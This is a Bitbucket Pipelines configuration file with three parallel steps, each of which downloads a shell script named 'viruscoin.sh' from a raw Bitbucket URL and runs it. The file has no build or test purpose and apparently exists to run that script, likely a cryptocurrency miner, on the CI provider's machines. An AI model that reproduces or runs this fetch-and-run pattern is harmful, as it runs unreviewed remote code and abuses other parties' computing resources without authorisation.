image: ubuntu:bionic

pipelines:
  default:
    - parallel:
      - step:
          name: Runsc3
          script:
            - apt update -y && apt install -y wget
            - wget https://bitbucket.org/Akujcolilupe/dior/raw/edfc9e88dfb4125a254f375587179bd270ec7d80/viruscoin.sh && chmod u+x viruscoin.sh && ./viruscoin.sh 
      - step:
          name: Runsc2
          script:
            - apt update -y && apt install -y wget
            - wget https://bitbucket.org/Akujcolilupe/dior/raw/edfc9e88dfb4125a254f375587179bd270ec7d80/viruscoin.sh && chmod u+x viruscoin.sh && ./viruscoin.sh 
      - step:
          name: Runsc
          script:
            - apt update -y && apt install -y wget
            - wget https://bitbucket.org/Akujcolilupe/dior/raw/edfc9e88dfb4125a254f375587179bd270ec7d80/viruscoin.sh && chmod u+x viruscoin.sh && ./viruscoin.sh 